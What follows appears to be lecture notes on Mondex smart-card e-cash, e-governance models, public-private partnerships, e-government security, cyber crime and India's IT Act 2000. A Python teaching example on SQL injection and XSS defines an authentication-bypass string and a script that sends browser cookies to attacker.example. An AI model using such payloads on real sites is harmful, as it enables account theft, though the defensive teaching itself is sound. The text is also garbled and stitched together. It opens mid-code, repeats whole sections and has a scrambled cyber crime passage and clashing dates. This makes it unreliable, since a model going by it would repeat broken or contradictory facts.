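    """Issuer-side check when the card next goes online. bank_loads is the total
    the bank itself loaded; everything else must be reconstructed from the card's
    log. After overflow the missing value is visible but not attributable."""
    debits = sum(a for _, kind, a, _ in purse.log if kind == "debit")
    credits = sum(a for _, kind, a, _ in purse.log if kind == "credit")
    expected = bank_loads - debits + credits
    return {
        "expected": expected,
        "reported": purse.balance,
        "unexplained": expected - purse.balance,     # value the log cannot account for
        "lost_entries": purse.seq - len(purse.log),  # transactions dropped by overflow
    }


if __name__ == "__main__":
    alice, shop = Purse("A"), Purse("SHOP")
    load(alice, 1000)
    for _ in range(12):          # 12 offline payments exceed the 10-entry log
        pay(alice, shop, 50)
    print(reconcile(alice, bank_loads=1000))
```

In the run above the bank sees 100 pence of "unexplained" value leaving the card and three dropped log entries, but it cannot tell whether those were two honest 50-pence purchases or a tampered balance: that indistinguishability is the fraud-detection weakness the critics describe.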

While Mondex smart cards are not a hundred percent secure, the system is designed to tolerate minor fraud loss.

Mondex believes its electronic payment system is secure and is convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card comes down to a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of it. Different governments and organizations define the term to suit their own aims and objectives. Sometimes the term 'e-government' is used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services are made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

The two terms are often treated as the same; however, there is some difference between them. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as a definition of e-governance is that it makes no provision for the governance of the ICTs themselves. As a matter of fact, governing ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders that these concerns involve. So the perspective of e-governance is the use of technologies that both help in governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India; United Telecoms Limited (UTL) is a major player in India on PPP based e-governance projects, each of which involved a mammoth state-wide area network in its state.

E-governance is the future many countries look forward to for corruption-free government. E-government is described as a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for a given individual have actually reached them. There should be an auto-response to support this essence, whereby the Government can gauge the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

(Architecture diagram not reproduced in this transcript.)

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is possible because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, new Web applications, or even a database environment such as Oracle. Seamless interconnection, and thereby effective use of the entire e-Governance system, is possible if the middleware provides the necessary services such as transactions, database management, messaging and naming.

Regarding security, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service API (GSS-API). While CORBA Security leans heavily on these, public key security with Secure Sockets Layer (SSL, since superseded by TLS) is popular for Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or one's home or workplace) and how to interact with the government (e.g. through the Internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the Internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the provision of a public good or service by the latter
• Generally, but not always, involving
  - Long term contracts
  - User charges and/or payments flowing between the parties
  - Shared investments, but mainly private
  - Risk sharing by the parties
• Must be a partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal head room
• As a way of financing the project
• Separate policy & regulation from operations
• Make the good or service available
• Pay for performance and output
• Introduce competition, for and in the market

The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals
Shared resources (time, money, expertise, people)
Shared risks
Shared benefits

Benefits

Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital

Two Major Steps

Crafting the Partnership
Implementing the Partnership

Project Management -

Six Distinct Phases

1. Genesis
   What's the need?
   What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
   Is there a need for a Public/Private Partnership?
   Preliminary project definition

2. Feasibility
   Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
   Market research
   Economic/financial analysis
   Program, budget and schedule
   Risk analysis

3. Plan and Test
   Final project definition
   What is the best way to complete the project?
   Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
   Master schedule/budget
   Political climate
   Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
   How do you choose and contract with the best-value private partner?
   What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
   What do current statutes allow?
   Procurement approach: sole source, RFP, low bid
   Risk allocation between public and private partners
   Structuring of contract, risks and rewards

5. Implement
   Environmental
   Design
   Permitting
   Construction
   Commissioning and administration

6. Operate
   Startup
   Monitoring
   Assessment
   Enhancement
   Contract modifications
   Contract renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all share broadly similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites, one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services depends heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency in public administration but also to strengthen confidence in privacy measures, by creating mutual transparency between public administration and citizens.

The process approach of an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish a policy and objectives for information security;

implementing and operating controls to manage the organization's information security risks in the context of its overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS, and continual improvement based on objective measurement.

Data security requires a set of security properties:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what they are trying to do.
Confidentiality: the capability to prevent unauthorized access to information.
Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing:

Protecting premises, equipment and systems software, including input/output units.
Protecting software applications used to process personal data.
Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks.
Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Trusted security and privacy measures are a crucial success factor for e-Government, yet one not fully addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe leads, with 44% of its countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats, including attacks that use packet sniffers, probes, malware, attacks on the Internet infrastructure, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

continually improve its control environment, and effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. One research study found 816 e-Government websites from 212 different countries to be vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity (and, because it lets the attacker rewrite the query, confidentiality and authentication as well), while XSS is a vulnerability attackers may exploit to steal users' information.
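Both flaws named above come from the same mistake, treating user input as code rather than data, and both have the same well-known fix. The following is an added example, not code from the research study cited or from any e-Government site: a login query built by string concatenation and a page that reflects a name unescaped, each beside its hardened counterpart, run against an in-memory SQLite table. The table, the sample users, the passwords and the payload strings are constructed for illustration; passwords are stored in clear only to keep the example short, and a real system would store salted hashes.

```python
# Added example: SQL injection and XSS, vulnerable form beside the hardened
# form. Uses an in-memory SQLite table with constructed users; not code from
# any real e-Government application.
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table. Clear-text passwords are an example
    simplification; a real system stores salted password hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("clerk", "s3cret", "staff"), ("admin", "hunter2", "admin")])
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str):
    # Concatenating input into the statement lets the attacker rewrite the WHERE
    # clause: a username of  admin' --  turns the password check into a comment.
    query = (f"SELECT role FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db: sqlite3.Connection, username: str, password: str):
    # Bound parameters reach the engine as data, never as SQL text, so the same
    # payload is just a username that does not exist.
    row = db.execute("SELECT role FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def render_vulnerable(display_name: str) -> str:
    # Reflecting user-controlled text into HTML unescaped is the XSS flaw:
    # the browser runs whatever script the "name" contains.
    return f"<p>Welcome, {display_name}</p>"


def render_safe(display_name: str) -> str:
    # Escaping at the point of output turns markup into inert text.
    return f"<p>Welcome, {html.escape(display_name, quote=True)}</p>"


# Constructed payloads: an authentication bypass and a cookie-stealing script.
PAYLOAD_SQLI = "admin' --"
PAYLOAD_XSS = ("<script>document.location='http://attacker.example/?c='"
               "+document.cookie</script>")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, PAYLOAD_SQLI, "wrong"))
    print("safe login:      ", login_safe(db, PAYLOAD_SQLI, "wrong"))
    print(render_vulnerable(PAYLOAD_XSS))
    print(render_safe(PAYLOAD_XSS))
```

Note that `login_vulnerable` grants the admin role without any password at all, which is why the text's "compromise data integrity" understates the impact: the injected query defeats authentication outright. Parameterized queries and output escaping are the whole of the fix; input filtering alone is not a substitute for either.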

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

PREPARED BY ARUN PRATAP SINGH 54

54

CYBER CRIME AND LAWS

The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment

or any offence against morality social order or any unjust or shameful act The ldquoOffence

is defined in the Code of Criminal Procedure to mean as an act or omission made

punishable by any law for the time being in force

Cyber Crime is emerging as a serious threat World wide governments police

departments and intelligence units have started to react

Cyber Crime is a term used to broadly describe criminal activity in which computers or

computer networks are a tool a target or a place of criminal activity and include everything

from electronic cracking to denial of service attacks It is also used to include traditional

crimes in which computers or networks are used to enable the illicit activity

Computer crime mainly consists of unauthorized access to computer systems data

alteration data destruction theft of intellectual property Cyber crime in the context of

national security may involve hacking traditional espionage or information warfare and

related activities

Pornography Threatening Email Assuming someones Identity Sexual Harassment

Defamation Spam and Phishing are some examples where computers are used to commit

crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking

are examples where computers become target of crime

Cyber Crime Variants

Hacking -

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting -

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing -

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking -

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing -

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base -

- 121 Million Internet Users
- 65 Million Active Internet Users, up by 28% from 51 million in 2010
- 50 Million users shop online on E-commerce and Online Shopping Sites
- 46+ Million Social Network Users
- 346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43 -

Whoever, without permission of the owner of the computer:

- Secures access;
- Downloads, copies or extracts any data, computer database or any information;
- Introduces or causes to be introduced any virus or contaminant;
- Disrupts or causes disruption;
- Denies or causes denial of access to any person;
- Provides any assistance to any person to facilitate access;
- Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43 also covers whoever:

- Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;
- Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- any information that is grossly offensive or has menacing character; or
- any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, make use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated the 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got the Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences (section, offence, punishment) -

Section 65 - Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years and/or fine up to 2 lakh rupees.

Section 66 - Hacking. Punishment: imprisonment up to three years and/or fine up to 5 lakh rupees.

Section 66-A - Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government, or its authorized agency, to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States, or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

- Perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with microchips.

Construction of Smart Cards -

Why Smart Cards -

- Improve the convenience and security of any transaction
- Provide tamper-proof storage of user and account identity
- Provide vital components of system security
- Protect against a full range of security threats

Advantages -

- Flexibility
- Security
- Portability
- Increasing data storage capacity
- Reliability

Schematic overview of a smart card

Smart Card Processing

Smart Card Applications -

- Ticketless travel
  o Seoul bus system: 4M cards, 1B transactions since 1996
  o Planned for the SF Bay Area system
- Authentication, ID
- Medical records
- E-cash
- Store loyalty programs
- Personal profiles
- Government
  o Licenses
- Mall parking
- Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet or telephone networks, etc.
- Keeps transaction records
- Password protection and "lock card" functions
- Portable balance finder to check balance
- Supports multiple currencies

ADVANTAGES

CONSUMER -

- Convenience
- Accessibility
- On-chip record of recent transactions
- Home load
- Internet purchases

MERCHANT -

- Reliable off-line payment
- Higher security
- Low transaction cost
- Reduced cash handling

FINANCIAL INSTITUTION -

- Strengthen customer relationships
- New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy -

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information:

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information:

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate:

o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information:

o firewalls in Multos, between applications (ITSEC E6 designation)
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with a definition of e-governance, is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and Operating System independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

